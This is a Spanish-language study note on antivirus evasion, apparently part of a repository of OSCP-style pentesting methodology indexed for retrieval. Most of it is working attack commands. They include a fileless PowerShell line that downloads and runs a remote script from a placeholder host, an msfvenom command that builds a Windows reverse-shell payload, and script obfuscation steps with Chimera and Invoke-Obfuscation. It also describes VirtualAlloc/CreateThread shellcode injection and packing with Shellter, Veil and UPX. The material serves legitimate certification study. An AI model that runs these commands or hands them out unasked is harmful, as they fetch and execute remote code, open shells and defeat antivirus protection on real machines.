JARVIS/nucleo/saber/conocimiento/08 - Avanzado/AV evasion.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

1.3 KiB

AV evasion

Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion.

PowerShell en memoria (no toca disco)

IEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1')   # fileless
powershell -ExecutionPolicy Bypass -File evasion.ps1
powershell -encodedCommand JABjAG8AZABl...    # comando en base64 (UTF-16LE)

Generar y ofuscar

msfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1   # → msfvenom
python3 ps_encoder.py -s evasion.ps1        # darkoperator/Invoke-Obfuscation
./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1   # Chimera: ofusca strings/variables

Inyección directa (P/Invoke)

Script PS que reserva memoria con VirtualAlloc, copia el shellcode y lanza CreateThread → ejecuta sin escribir un .exe al disco (evade el escaneo on-write).

Otras tools

  • Shellter (inyecta en un .exe legítimo), Veil, Nim/C# loaders.
  • UPX para empaquetar y cambiar la firma: upx -9 rev.exe.

Nota OSCP: la evasión de AV está permitida (no es un escáner de vulns prohibido → Reglas de herramientas); rara vez hace falta en el examen, pero alguna máquina la pide.

Relacionado: Client-side attacks · msfvenom · Reverse shell · OSCP MOC